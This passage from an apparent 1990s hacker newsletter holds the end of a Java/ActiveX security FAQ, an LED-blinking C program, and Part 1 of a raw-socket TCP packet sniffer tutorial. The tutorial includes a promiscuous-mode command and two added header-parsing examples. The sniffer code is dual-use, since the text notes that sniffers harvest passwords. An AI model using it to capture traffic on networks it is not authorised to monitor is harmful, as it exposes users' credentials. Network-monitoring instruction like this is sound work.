       implementers did everything right. They're smart and experienced and motivated, but that doesn't make them infallible. 
       
       When Java security does break down, the potential consequences are just as bad as those of an ActiveX problem: a hostile program can come
       to your machine and access your data at will. 
       
        +  What about "signed applets" in Java?
       
       One problem with the original version of Java is that the "sandbox" can be too restrictive. For example, Java programs are not allowed to
       access files, so there's no way to write a text editor. (What good is editing if you can't save your work?) 
       
       Java-enabled products are now starting to use digital signatures to work around this problem. The idea is like ActiveX: programs are digitally
       signed and you can decide, based on the signature, to give a program more power than it would otherwise have. This lets you run a text editor
       program if you decide that you trust its author. 
       
       The downside of this scheme is that it introduces some of the ActiveX problems. If you make the wrong decision about who to trust, you could be
       very sorry. There's no known way to get around this dilemma. Some kinds of programs must be given power in order to be useful, and there's no
       ironclad guarantee that those programs will be well-behaved. 
       
       Still, Java with signed applets does offer some advantages over ActiveX. You can put only partial trust in a program, while ActiveX requires
       either full trust or no trust at all. And a Java-enabled browser could keep a record of which dangerous operations are carried out by each trusted
       program, so it would be easier to reconstruct what happened if anything went wrong. (Current browsers don't do this record-keeping, but we
       wish they would.) Finally, Java offers better protection against accidental damage caused by buggy programs. 
       
        +  What about plug-ins?
       
       Plug-ins are a method for adding code to your browser. Plug-ins have the same security model as ActiveX: when you download a plug-in, you
       are trusting it to be harmless. All of the warnings about ActiveX programs apply to plug-ins too. 
       
        +  Can I be hurt by a "good" plug-in or ActiveX program?
       
       Unfortunately, yes. This depends entirely on what the plug-in or program does. Many plug-ins such as Macromedia's Shockwave or Sun's
       Safe-Tcl are actually completely general programming systems, just like Java. By accepting a plug-in like this, you're trusting that the plug-in
       program has no security-relevant bugs. As we have seen with Java, systems that are meant to be secure often have bugs that lead to security
       problems. 
       
       With ActiveX, this problem is made worse if you click the box which accepts all programs signed by the same person (for example, if you accept
       anything signed by Microsoft). While one Microsoft program may be secure, another one may have a security-relevant bug. 
       
        This problem even applies to code written by your own company for internal use. Once the plug-in or program is installed in your browser, an
        external attacker (who knew about the program) could write a Web page which used your internal program, passed it funny data which
        corrupted the program, and so took over your machine. 
       
       If you're feeling paranoid, the only plug-ins you should allow are those with less than general purpose functionality. A plug-in which handles a new
       image, video, or audio format is less likely to be exploitable than a plug-in for a completely general animation system. 
       
        +  This sounds pretty scary. How worried should I be?
       
       The good news is that there have been few incidents of people being damaged by hostile Java or ActiveX programs. The reason is simply that
       the people with the skills to create malicious programs have chosen not to do so. 
       
       For most people, continuing to use Java and ActiveX is the right choice. If you are informed about the risks, you can make a rational decision to
       accept some danger in exchange for the benefits of using Java and ActiveX. 
       
        +   How can I lower my risk?
       
       There are several things you can do. 
       
           - Think very carefully before accepting a digitally signed program. How competent and trustworthy is the signer? 
           - Use up-to-date browser versions, and install the security patches offered by your browser vendor. 
           - Never surf the Web on a computer that contains highly sensitive information like medical records. 
       
       
       DISCLAIMER: This information is our opinion only. It is not the opinion of Princeton University or of our research sponsors. We do not and
       cannot guarantee that you will be safe if you follow our advice. 
       
        Copyright (c) 1997 by Edward W. Felten 
       
       Princeton University 
       Department of Computer Science 
       Contact: sip@cs.princeton.edu 
       
       @HWA
       
  07.0 Some cool geek code (leetbuzz.c) to roll your led's from a suid root acct...
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       /*
        * leetbuzz.c - buzzes your scr/lck led in a leet fashion
        * derived from heartbeat.c by alessandro rubini (your book's just best :)
        *
        * this little program will attract some geek eyes at the next hack event
        * for sure ;-)
        *
        * by scut <scut@nb.in-berlin.de>
        *
         * must be executed as suid root, fortunately
        *
        * compile with: gcc -o leetbuzz leetbuzz.c -lm
        *
        * tested with 2.[02].x on alpha, sparc and x86
        */
       
       #define LB_SHUTTER      32
       // #define      LB_MODE_ALT
       
       #include <ctype.h>
       #include <errno.h>
       #include <fcntl.h>
       #include <linux/kd.h>
       #include <math.h>
       #include <stdio.h>
       #include <stdlib.h>
       #include <string.h>
       #include <sys/ioctl.h>
       #include <sys/stat.h>
       #include <sys/time.h>
       #include <sys/types.h>
       #include <unistd.h>
       
       int     consolefd;
       char    flasher[LB_SHUTTER];
       
       void    led_runthru(char *, int, unsigned long);
       void    led_doshutter(char *, int);
       int     led_sinewave(int);
       int     led_init(void);
       void    led_uninit(void);
       void    led_set(void);
       void    led_unset(void);
       int     led_change(void);
       
       int
       main(int argc, char **argv)
       {
               if (led_init() == 0) {
                       fprintf(stderr, "cannot open tty, lammah\n");
                       exit(1);
               }
       
               for (;;) {
                       led_sinewave(5);
                       led_runthru(flasher, LB_SHUTTER, 5000);
               }
               exit(0); /* never happen */
       }
       
       /* runs through our neat array
        */
       void
       led_runthru(char *p_array, int max, unsigned long waitdigit)
       {
               struct timeval  st;
               struct timeval  ct;
               int     n;
       
               for (n = 0; n < max; n++) {
                       if (gettimeofday(&st, NULL) == -1) return;
       
                       if (p_array[n] == '\x00') {
                               led_unset();
                       } else if (p_array[n] == '\x01') {
                               led_set();
                       }
                       if (gettimeofday(&ct, NULL) == -1) return;
                        /* widen before multiplying: tv_sec * 1000000 overflows a 32-bit long */
                        while ((((unsigned long long)ct.tv_sec * 1000000 + ct.tv_usec) -
                                ((unsigned long long)st.tv_sec * 1000000 + st.tv_usec)) < waitdigit)
                                gettimeofday(&ct, NULL);
               }
               return;
       }
       
       /* little bresenham hack to stretch our intensity
        */
       void
       led_doshutter(char *p_array, int intensity)
       {
               int     n = 0;
               float   e;
               int     x, y;
       
               if (intensity > LB_SHUTTER)
                       return;
       
               for (y = x = 0; x < LB_SHUTTER; x++) {
                       e = y - ((x * intensity) / LB_SHUTTER);
                       if (e < 0) {
                               e *= -1;
                       }
                       if (e <= 0.5) {
                               p_array[x] = '\x00';
                       } else {
                               p_array[x] = '\x01';
                               y++;
                       }
               }
       
       #ifdef DEBUG
               for (x = 0; x < LB_SHUTTER; x++)
                       printf("%c", (p_array[x]) ? 'X' : ' ');
               printf("\n");
       #endif
       
               return;
       }
       
        /* tells whether the led should be active (1) or not (0) for sinewave
        * with period (in seconds)
        * first call -> init
        * period = 0 -> init
        */
       int
       led_sinewave(int period)
       {
               static struct timeval   *st = NULL;
               static struct timeval   *ct = NULL;
       
               double                  t_f;
               unsigned long long      st_usec;
               unsigned long long      ct_usec;
               unsigned long long      td;
       
               /* new init ? */
               if (period == 0) {
                       free(st);
                       st = NULL;
               }
               if (st == NULL) {
                       st = calloc(1, sizeof(struct timeval));
                       if (gettimeofday(st, NULL) == -1) {
                               fprintf(stderr, "cannot get time of day for st :)\n");
                               exit(1);
                       }
               }
               if (period == 0)
                       return (0);
       
               if (ct == NULL) {
                       ct = calloc(1, sizeof(struct timeval));
               }
       
               /* get current time and then compare */
               if (gettimeofday(ct, NULL) == -1) {
                       fprintf(stderr, "cannot get time of day for ct :)\n");
                       exit(1);
               }
       
                /* widen before multiplying: tv_sec * 1000000 overflows a 32-bit long */
                st_usec = (unsigned long long)st->tv_sec * 1000000 + st->tv_usec;
                ct_usec = (unsigned long long)ct->tv_sec * 1000000 + ct->tv_usec;
               td = ct_usec - st_usec;  /* difference */
       
               /* compute relative period, then compute sine value */
               td = (td % (period * 1000000));
               t_f = (double)(td / (double)(period * 1000000));
               t_f *= 2 * M_PI; /* yeah, i like math.h */
       #ifdef  LB_MODE_ALT
               t_f = ((sin(t_f) + 1) / 3) + 0.3;
       #else
               t_f = (sin(t_f) + 1) / 2; /* we don't need negative LEDs */
       #endif
       
       #ifdef DEBUG
               printf("%3.5f : ", t_f);
       #endif
               led_doshutter(flasher, (int)(t_f * LB_SHUTTER));
               return(1);
       }
       
       int
       led_init(void)
       {
               consolefd = open("/dev/tty0", O_RDONLY);
               if (consolefd == -1)
                       return(0);
               return(1);
       }
       
       void
       led_uninit(void)
       {
               close(consolefd);
               return;
       }
       
        void
        led_set(void)
        {
                ioctl(consolefd, KDSETLED, 1);
                return;
        }
        
        void
        led_unset(void)
        {
                ioctl(consolefd, KDSETLED, 0);
                return;
        }
        
        /* toggles the led; returns the state read before the change,
         * or 0 if the state could not be read
         */
        int
        led_change(void)
        {
                char    led = 0;
        
                if (ioctl(consolefd, KDGETLED, &led) != -1) {
                        ioctl(consolefd, KDSETLED, (led == 1) ? 0 : 1);
                }
                return(led);
        }

       @HWA
       
 08.0  Building a packet sniffer from the ground up Part I
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
                          Basic Packet-Sniffer Construction
                                  from the Ground Up

                                       Part 1
                                         by

                                     Chad Renfro
                                 raw_sock@hotmail.com


           Packet sniffers are applications used by network administrators to monitor and
        validate network traffic. Sniffers are programs used to read packets that travel across 
        the network at various layers of the OSI model. Like most security tools, sniffers
        can be used for both good and destructive purposes. On the light side of network
        administration, sniffers help quickly track down problems such as bottlenecks and
        misplaced filters. On the dark side, however, sniffers can be used to wreak tremendous
        amounts of havoc by gathering legitimate user names and passwords so that other
        machines can be quickly compromised. Hopefully this paper will help
        administrators gain control of their networks by enabling them to analyze network traffic 
        not only with preconstructed sniffers but with sniffers they have written themselves. This
        paper will look at the packet sniffer from the bottom up, looking in depth at the sniffer
        core and then gradually adding functionality to the application. The example included
        here will help illustrate some rather cumbersome issues that come up in network
        programming. In no way will this single paper teach a person to write a complete sniffing
        application like tcpdump or sniffit. It will, however, teach some very fundamental issues
        that are inherent to all packet sniffers: how the packets are accessed on the network
        and how to work with the packets at different layers.
       
       
       The most basic sniffer...
       
       Sniffer #1.
       
           This sniffer will illustrate the use of the SOCK_RAW device and show how to gather
        packets from the network and print out some simple header information to std_out.
        Although the basic premise is that packet sniffers operate in promiscuous mode, which
        listens to all packets whether or not the packet is destined for the machine's MAC address,
        this example will collect packets in non-promiscuous mode. This will let us concentrate
        on the SOCK_RAW device for the first example. To operate this same code in
        promiscuous mode the network card may be put in promiscuous mode manually. To do
        this, type this in after logging in:
       
       
          > su -
          Password : ********
          # ifconfig eth0 promisc
       
           This will now set the network interface eth0 in promiscuous mode. 
       
       
       /************************simple_Tcp_sniff.c********************/
       
       1.      #include <stdio.h>
       2.      #include <sys/socket.h>
       3.      #include <netinet/in.h>
       4.      #include <arpa/inet.h>
       
       5.      #include "headers.h"
       
       6.      int main()
       7.      {
        8.          int sock, bytes_recieved; socklen_t fromlen;
       9.          char buffer[65535];
       10.         struct sockaddr_in from;
       11.         struct ip  *ip;
       12.         struct tcp *tcp;
       13.
       
       14.         sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
       
       15.     while(1)
       16.      {
       17.             fromlen = sizeof from;
       18.             bytes_recieved = recvfrom(sock, buffer, sizeof buffer, 0,
                                                        (struct sockaddr *)&from, &fromlen);
       19.             printf("\nBytes received ::: %5d\n",bytes_recieved);
       20.             printf("Source address ::: %s\n",inet_ntoa(from.sin_addr));
       21.             ip = (struct ip *)buffer;
       22.             printf("IP header length ::: %d\n",ip->ip_length);
       23.             printf("Protocol ::: %d\n",ip->ip_protocol);
       24.             tcp = (struct tcp *)(buffer + (4*ip->ip_length));
        25.             printf("Source port ::: %d\n",ntohs(tcp->tcp_source_port));
       26.             printf("Dest port  ::: %d\n",ntohs(tcp->tcp_dest_port));
       
       27.              }
       28. }
       /***********************EOF**********************************/
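        As an added example (written for this reprint, not part of the article's code), here is the same header walk as lines 21-26 above done with the length checks the sniffer skips: it takes the byte count recvfrom() actually returned, validates ip_length and the total length before dereferencing anything, and reads the header length from the first byte so it does not depend on the compiler's bit-field layout. The packet bytes are constructed.

```c
/* Added example, not part of Chad Renfro's article: parse the IP and TCP
 * headers out of a received buffer the way simple_Tcp_sniff.c does, but
 * (a) reading the header length from the first byte instead of trusting a
 * bit-field layout, and (b) checking every length before it is used, so a
 * short read or a bogus ip_length cannot make us read past the data.
 * The packet bytes below are constructed for illustration. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct tcp_summary {
    unsigned ip_hdr_words;   /* IHL, what line 22 of the sniffer prints */
    unsigned protocol;       /* ip_protocol, 6 for TCP */
    uint32_t src_ip, dst_ip; /* host byte order */
    unsigned src_port, dst_port;
    unsigned payload_len;    /* bytes after the TCP header */
};

/* len must be the count recvfrom() returned, not sizeof buffer.
 * Returns 0 on success, -1 if the datagram is truncated or malformed. */
int parse_ip_tcp(const unsigned char *buf, size_t len, struct tcp_summary *out)
{
    size_t ihl, thl, total;
    const unsigned char *tcp;

    if (len < 20 || (buf[0] >> 4) != 4)       /* need a full IPv4 header */
        return -1;
    ihl = (size_t)(buf[0] & 0x0f) * 4;         /* line 24's 4*ip->ip_length */
    total = ((size_t)buf[2] << 8) | buf[3];    /* ip_total_length */
    if (ihl < 20 || total < ihl || total > len)
        return -1;                             /* lies about its own size */
    if (buf[9] != 6)                           /* not TCP */
        return -1;
    tcp = buf + ihl;
    if (total - ihl < 20)                      /* need a full TCP header */
        return -1;
    thl = (size_t)(tcp[12] >> 4) * 4;          /* TCP data offset */
    if (thl < 20 || ihl + thl > total)
        return -1;

    out->ip_hdr_words = (unsigned)(ihl / 4);
    out->protocol = buf[9];
    out->src_ip = ((uint32_t)buf[12] << 24) | ((uint32_t)buf[13] << 16) |
                  ((uint32_t)buf[14] << 8) | buf[15];
    out->dst_ip = ((uint32_t)buf[16] << 24) | ((uint32_t)buf[17] << 16) |
                  ((uint32_t)buf[18] << 8) | buf[19];
    out->src_port = (tcp[0] << 8) | tcp[1];    /* big-endian on the wire */
    out->dst_port = (tcp[2] << 8) | tcp[3];
    out->payload_len = (unsigned)(total - ihl - thl);
    return 0;
}

/* constructed: a 40-byte TCP SYN, 192.168.1.10:50000 -> 10.0.0.1:80 */
static const unsigned char SAMPLE_SYN[40] = {
    0x45, 0x00, 0x00, 0x28, 0x12, 0x34, 0x40, 0x00, 0x40, 0x06, 0x00, 0x00,
    0xc0, 0xa8, 0x01, 0x0a, 0x0a, 0x00, 0x00, 0x01,
    0xc3, 0x50, 0x00, 0x50, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
    0x50, 0x02, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00
};

static void print_endpoint(const char *label, uint32_t ip, unsigned port)
{
    printf("%s ::: %u.%u.%u.%u:%u\n", label, ip >> 24, (ip >> 16) & 0xff,
           (ip >> 8) & 0xff, ip & 0xff, port);
}

int main(void)
{
    struct tcp_summary s;
    unsigned char bogus[40];

    if (parse_ip_tcp(SAMPLE_SYN, sizeof SAMPLE_SYN, &s) != 0) {
        fprintf(stderr, "malformed packet\n");
        return 1;
    }
    printf("IP header length ::: %u words\nProtocol ::: %u\n",
           s.ip_hdr_words, s.protocol);
    print_endpoint("Source", s.src_ip, s.src_port);
    print_endpoint("Dest  ", s.dst_ip, s.dst_port);

    /* same packet claiming an IHL of 15 (60-byte header) in a 40-byte read:
     * line 24 of the sniffer would point tcp past the received data */
    memcpy(bogus, SAMPLE_SYN, sizeof bogus);
    bogus[0] = 0x4f;
    printf("bogus IHL accepted? %s\n",
           parse_ip_tcp(bogus, sizeof bogus, &s) == 0 ? "yes" : "no");
    return 0;
}
```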
       
       What this means :
       
       Line 1-4 :
          These are the header files required to use some needed c functions we will use later
       
               <stdio.h>      =     functions like printf and std_out
               <sys/socket.h> =     this will give access to the SOCK_RAW and the 
                                    IPPROTO_TCP defines        
               <netinet/in.h> =     structs like the sockaddr_in 
               <arpa/inet.h>  =     lets us use the functions to do network to host byte 
                                    order conversions
       line 5 :
          This is the header file headers.h that is also included with this program to give standard
          structures to access the ip and tcp fields. The structures identify each field in the ip and
          tcp header for instance :
        
               struct ip {
                      unsigned int        ip_length:4;         /* length of ip-header in 32-bit
                                                                  words*/
                      unsigned int        ip_version:4;        /* set to "4", for Ipv4 */
                      unsigned char       ip_tos;              /* type of service*/
                      unsigned short      ip_total_length;     /* Total length of ip datagram in
                                                                  bytes */
                      unsigned short      ip_id;               /*identification field*/
                      unsigned short      ip_flags;
                      unsigned char       ip_ttl;              /*time-to-live, sets upper limit
                                                                 for max number of routers to 
                                                                 go through before the packet is
                                                                 discarded*/
       
                      unsigned char       ip_protocol;         /*identifies the correct transport
                                                                 protocol */
                      unsigned short      ip_cksum;            /*calculated for the ip header ONLY*/
                      unsigned int        ip_source;           /*source ip */
                      unsigned int        ip_dest;             /*dest ip*/
               };
       
       
       
               struct tcp {
                        unsigned short     tcp_source_port; /*tcp source port*/
                        unsigned short     tcp_dest_port;   /*tcp dest port*/
                        unsigned int       tcp_seqno;       /*tcp sequence number,
                                                              identifies the byte in the 
                                                              stream of data*/
                         unsigned int       tcp_ackno;       /*contains the next seq num that
                                                               the sender expects to receive*/
                         unsigned int       tcp_res1:4,      /*little-endian*/
                                            tcp_hlen:4,      /*length of tcp header in 32-bit
                                                               words*/ 
                                            tcp_fin:1,       /*Finish flag "fin"*/
                                            tcp_syn:1,       /*Synchronize sequence
                                                               numbers to start a connection*/
                                            tcp_rst:1,       /*Reset flag */
                                            tcp_psh:1,       /*Push, sends data to the
                                                               application*/
                                            tcp_ack:1,       /*acknowledge*/
                                            tcp_urg:1,       /*urgent pointer*/
                                            tcp_res2:2;
                         unsigned short     tcp_winsize;     /*maximum number of bytes able
                                                               to receive*/
                         unsigned short     tcp_cksum;       /*checksum to cover the tcp
                                                               header and data portion of the
                                                               packet*/

                         unsigned short     tcp_urgent;     /*valid only if the urgent flag is
                                                              set, used to transmit
                                                              emergency data */
               };
       
       
       line 8-13 :
          This is the variable declaration section
             
                integers :
                     sock                 = socket file descriptor 
                     bytes_recieved       = bytes read from the open socket "sock" 
                     fromlen              = the size of the from structure
                char :
                     buffer               = where the ip packet that is read off the 
                                            wire will be held. buffer holds a datagram 
                                            of 65535 bytes, which is the maximum length 
                                            of an ip datagram.
       
              Struct sockaddr_in :
       
                  struct sockaddr_in {
                       short int          sin_family;  /* Address family   */
                       unsigned short int sin_port;    /* Port number      */
                       struct in_addr     sin_addr;    /* Internet address */
                       unsigned char      sin_zero[8]; /* Same size as struct sockaddr */
                   };
       
              Before we go any further two topics should be covered: byte-ordering and sockaddr
           structures.  Byte-ordering is the way that the operating system stores bytes in memory.
           There are two ways that this is done. First, with the low-order byte at the starting
           address; this is known as "little-endian", and on an Intel machine it is the host byte
           order. Next, bytes can be stored with the high-order byte at the starting address; this
           is called "big-endian" or network byte order. The Internet protocol uses network byte order.
            
               This is important because if you are working on an intel based linux box you will be
           programming on a little-endian machine and to send data via ip you must convert the
           bytes to network byte order. For example, let's say we are going to store a 2-byte number
           in memory, say the value is (in hex) 0x0203
       
       
          First this is how the value is stored on a big-endian machine:
       
                           ___________
                          | 02  | 03  |
                          |_____|_____| 
               address:    0       1
       
       
          And here is the same value on a little-endian machine:
       
                          ___________
                         |03   | 02  |
                         |_____|_____|
              address:    1       0
       
       
       
          The same value is being represented in both examples it is just how we order the bytes
          that changes.
       
          The next topic that you must understand is the sockaddr vs. the sockaddr_in structures.
          The struct sockaddr is used to hold information about the socket such as the family type
          and other address information it looks like :
       
               struct sockaddr {
                         unsigned short sa_family;         /*address family*/ 
                         char           sa_data[14];       /*address data*/
               };
                
               
              The first element in the structure "sa_family" will be used to reference what the family
           type is for the socket, in our sniffer it will be AF_INET. Next the "sa_data" element
           holds the destination port and address for the socket. To make it easier to deal with the
           sockaddr struct, the sockaddr_in structure is commonly used instead. Sockaddr_in 
           makes it easier to reference all of the elements that are contained by sockaddr.
       
       
          Sockaddr_in looks like:
       
       
       
          struct sockaddr_in {
                    short int          sin_family;    /* Address family               */
                    unsigned short int sin_port;      /* Port number                  */
                    struct in_addr     sin_addr;      /* Internet address             */
                    unsigned char      sin_zero[8];   /* Same size as struct sockaddr */
          };
       
       
       
       
       
       
       
             We will use this struct and declare a variable "from" which will give us the information
          on the packet that we will collect from the raw socket. For instance the var
          "from.sin_addr" will give access to the packets source address (in 
           network byte order). The thing to mention here is that all items in the sockaddr_in
           structure must be in network byte order. When we receive the data in the sockaddr_in
           struct we must then convert it back to host byte order. To do this we can use some
           predefined functions to convert back and forth between host and network byte order.
       
          Here are the functions we will use:
       
               ntohs       : this function converts  network byte order to host byte order
                             for a 16-bit short
       
               ntohl       : same as above but for a 32-bit long
       
               inet_ntoa   : this function converts a 32-bit network binary value to a
                             dotted decimal ip address
       
               inet_aton   : converts a character string  address to the 32-bit network
                             binary value
       
               inet_addr   : takes a char string dotted decimal addr and returns a 32-bit
                             network binary value
       
          To further illustrate ,say I want to know the port number that this packet originated from:
       
               int packet_port; packet_port    =ntohs(from.sin_port);
                                                ^^^^^  
       
          If I want the source IP address of the packet we will use a special function to get it to the
          123.123.123.123 format:
       
                char *ip_addr; ip_addr  =inet_ntoa(from.sin_addr);
                                        ^^^^^^^^^
       
       line 11-12:
       
          struct ip *ip :
          struct tcp *tcp :
               
             This is a structure that we defined in our header file "headers.h". This structure is
          declared so that we can access individual fields of the ip/tcp header. The structure is like
          a transparent slide with predefined fields drawn on it. When a packet is taken off 
          the wire it is a stream of bits, to make sense of it the "transparency" (or cast) is laid on
          top of or over the bits so the individual fields can be referenced.
       
       Line 14 :
       
          sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
       
          This is the most important line in the entire program. Socket() takes three arguments in
          this form:
       
               sockfd = socket(int family, int type, int protocol);
       
       
       
               
           The first argument is the family. This could be either AF_UNIX which is used so a process
          can communicate with another process on the same host or AF_INET which is used for
           internet communication between remote hosts. In this case it will be  AF_INET . Next  
           is the type; the type is usually one of four choices (there are others that we will not
           discuss here). The main four are :

           1.   SOCK_DGRAM     : used for udp datagrams
           2.   SOCK_STREAM    : used for tcp packets
           3.   SOCK_RAW       : used to bypass the transport layer
                                 and directly access the IP layer

           4.   SOCK_PACKET    : this is linux specific, it is similar to
                                 SOCK_RAW except it accesses the DATA LINK Layer
       
              For our needs we will use the SOCK_RAW type. You must have root access to open a
            raw socket. The last parameter is the protocol; the protocol value specifies what type of
            traffic the socket should receive. For normal sockets this value is usually set to "0"
            because the socket can figure it out: if, for instance, the "type" SOCK_DGRAM is
            specified then the protocol should be UDP. In our case we just want to look at tcp 
            traffic so we will specify IPPROTO_TCP.
       
               
       line 15 :
          while (1)
       
         The while (1) puts the program into an infinite loop this is necessary so that after the
        first packet is processed we will loop around and grab the next. 
       
       
       Line 18:
          bytes_recieved = recvfrom(sock, buffer, sizeof buffer, 0, (struct sockaddr *)&from, &fromlen);
               
           Now here is where we are actually reading data from the open socket "sock". The from
          struct is also filled in but notice that we are casting "from" from a "sockaddr_in" struct
          to a "sockaddr" struct. We do this because the recvfrom() requires a sockaddr type but
          to access the separate fields we will continue to use the sockaddr_in structure. The 
          length of the "from" struct must also be present and passed by address. The recvfrom()
          call will return the number of bytes on success and a -1 on error and fill the global var
          errno.
       
           This is what we call "blocking I/O": the recvfrom() will wait here forever until a
           datagram on the open socket is ready to be processed. This is opposed to 
           non-blocking I/O, which is like running a process in the background and moving on to
           other tasks.
       
       
       Line 20:
          printf("Source address ::: %s\n",inet_ntoa(from.sin_addr));
       
          This printf uses the special function inet_ntoa() to take the value of "from.sin_addr"
          which is stored in Network-byte order and outputs a value in a readable ip form such
          as 192.168.1.XXX.
       
       Line 21:
          ip = (struct ip *)buffer;
       
          This is where we will overlay a predefined structure that will help us to individually
          identify the fields in the packet that we pick up from the open socket.
       
       
       Line 22:
          printf("IP header length ::: %d\n",ip->ip_length);
       
           The thing to notice on this line is "ip->ip_length": this accesses, through the ip pointer,
           the ip header length field. The important thing to remember is that the length 
           is expressed in 4-byte words. This will be more important later when trying to
           access items past the ip header such as the tcp header or the data portion of the packet.
       
       
       
       Line 23:
          printf("Protocol ::: %d\n",ip->ip_protocol);
               
          This gives access to the type of protocol such as 6 for tcp or 17 for udp.
       
       Line 24:
          tcp = (struct tcp *)(buffer + (4*ip->ip_length));
       
              Remember earlier it was mentioned that the ip header length is stored in 4 byte words,
          this is where that bit of information becomes important. Here we are trying to get access
          to the tcp header fields, to do this we must overlay a structure that has the fields
          predefined just as we did with ip. There is one key difference here the ip header fields
          were easy to access due to the fact that the beginning of the buffer was also the beginning
          of the ip header as so :
       
               
               |----------------- buffer ----------------|
                _________________________________________
               | ip header          |                    |
               |____________________|____________________|
                                    ^
                                    *ip
                                    ^
                                    *buffer
       
             So to get access to the ip header we just set a pointer casted as an ip structure to the
          beginning of the buffer like "ip = (struct ip *)buffer;". To get access to the tcp header 
          is a little more difficult due to the fact that we must set a pointer and cast it as a tcp
          structure at the beginning of the tcp header which follows the ip header in the buffer 
          as so :
       
               
                |----------------- buffer ---------------|
                 ________________________________________
                | ip header | tcp header |               |
                |___________|____________|_______________|
                            ^
                            *tcp
                               
       This is why we use 4*ip->ip_length to find the start of the tcp header.
       
       Line 25-26:
            printf("Source port ::: %d\n",ntohs(tcp->tcp_source_port));
           printf("Dest port  ::: %d\n",ntohs(tcp->tcp_dest_port));
       
          We can now access the source and dest ports which are located in the tcp header via 
          the structure as defined above.
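        To see the struct overlay, the 4*ip_length offset and the ntohs() conversions working on
        real bytes, here is an added example (not from the article or its author): it parses a
        constructed IPv4/TCP datagram that carries one IP option, and adds the length checks the
        sniffer above omits, so a short or lying datagram is refused instead of read past its end.
        The struct ip / struct tcp definitions copy headers.h and assume a little-endian host as the
        article does; sample_synack, pkt_info and parse_tcp_packet() are this example's own names.

```c
/* Added example, not the article's code.  Assumes a little-endian host (x86 Linux),
 * as the bit-field order in headers.h does.  Packet bytes below are constructed. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Same layout as headers.h (bit-fields in little-endian order). */
struct ip {
    unsigned int   ip_length:4;     /* IHL: header length in 32-bit words */
    unsigned int   ip_version:4;
    unsigned char  ip_tos;
    unsigned short ip_total_length; /* network byte order */
    unsigned short ip_id;
    unsigned short ip_flags;
    unsigned char  ip_ttl;
    unsigned char  ip_protocol;
    unsigned short ip_cksum;
    unsigned int   ip_source;       /* network byte order */
    unsigned int   ip_dest;
};

struct tcp {
    unsigned short tcp_source_port;
    unsigned short tcp_dest_port;
    unsigned int   tcp_seqno;
    unsigned int   tcp_ackno;
    unsigned int   tcp_res1:4, tcp_hlen:4,
                   tcp_fin:1, tcp_syn:1, tcp_rst:1, tcp_psh:1,
                   tcp_ack:1, tcp_urg:1, tcp_res2:2;
    unsigned short tcp_winsize;
    unsigned short tcp_cksum;
    unsigned short tcp_urgent;
};

/* The overlay only works if the compiler packs the structs to wire size. */
_Static_assert(sizeof(struct ip) == 20 && sizeof(struct tcp) == 20,
               "header structs must be 20 bytes");

/* Constructed sample: IPv4 header with IHL=6 (one 4-byte option: NOP NOP NOP EOL),
 * then a 20-byte TCP SYN/ACK from 192.168.1.10:443 to 10.0.0.5:49152, then 4
 * payload bytes.  48 bytes in all; the checksums are left as zero. */
const unsigned char sample_synack[48] = {
    0x46, 0x00, 0x00, 0x30, 0x12, 0x34, 0x40, 0x00, 0x40, 0x06, 0x00, 0x00,
    0xC0, 0xA8, 0x01, 0x0A, 0x0A, 0x00, 0x00, 0x05, 0x01, 0x01, 0x01, 0x00,
    0x01, 0xBB, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02,
    0x50, 0x12, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 't',  'e',  's',  't'
};

struct pkt_info {
    char           src[INET_ADDRSTRLEN], dst[INET_ADDRSTRLEN];
    unsigned       ip_hdr_bytes, tcp_hdr_bytes;
    unsigned short sport, dport;   /* host byte order */
    unsigned       syn, ack;
    size_t         payload_len;
};

/* Returns 0 and fills *out, or -1 if the datagram is truncated or not IPv4/TCP.
 * memcpy keeps the overlay idea but avoids misaligned access on stricter CPUs. */
int parse_tcp_packet(const unsigned char *buf, size_t len, struct pkt_info *out)
{
    struct ip  ih;
    struct tcp th;
    struct in_addr a;
    size_t ip_len, tcp_len, total;

    if (len < sizeof ih) return -1;
    memcpy(&ih, buf, sizeof ih);
    if (ih.ip_version != 4 || ih.ip_protocol != IPPROTO_TCP) return -1;

    ip_len = 4u * ih.ip_length;                 /* the article's 4*ip->ip_length */
    if (ip_len < sizeof ih || len < ip_len + sizeof th) return -1;
    memcpy(&th, buf + ip_len, sizeof th);       /* TCP header follows the IP options */

    tcp_len = 4u * th.tcp_hlen;                 /* data offset, also in 32-bit words */
    total   = ntohs(ih.ip_total_length);        /* big-endian on the wire */
    if (tcp_len < sizeof th || total > len || total < ip_len + tcp_len) return -1;

    a.s_addr = ih.ip_source; inet_ntop(AF_INET, &a, out->src, sizeof out->src);
    a.s_addr = ih.ip_dest;   inet_ntop(AF_INET, &a, out->dst, sizeof out->dst);
    out->ip_hdr_bytes  = (unsigned)ip_len;
    out->tcp_hdr_bytes = (unsigned)tcp_len;
    out->sport = ntohs(th.tcp_source_port);     /* network -> host byte order */
    out->dport = ntohs(th.tcp_dest_port);
    out->syn = th.tcp_syn;  out->ack = th.tcp_ack;
    out->payload_len = total - ip_len - tcp_len;
    return 0;
}

int main(void)
{
    struct pkt_info info;
    if (parse_tcp_packet(sample_synack, sizeof sample_synack, &info) != 0) {
        puts("malformed packet"); return 1;
    }
    printf("%s:%u -> %s:%u ihl=%u tcphl=%u syn=%u ack=%u payload=%zu\n",
           info.src, info.sport, info.dst, info.dport, info.ip_hdr_bytes,
           info.tcp_hdr_bytes, info.syn, info.ack, info.payload_len);
    return 0;
}
```

        With the option present, ip_length is 6, so the TCP header is found at byte 24, not 20;
        reading it at a fixed offset of 20 would misinterpret the option bytes as the ports.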
       
       
       
       
             This will conclude our first very simple tcp sniffer. This was a very basic application
           that should help define how to access packets passing on the network and how to use
           sockets to access the packets. Hopefully this will be the first of many papers to come;
           with each succeeding paper we will add a new or more complex feature to the sniffer. I
           should also mention that there are a number of great resources on the net that should aid
           you in further research in this area :
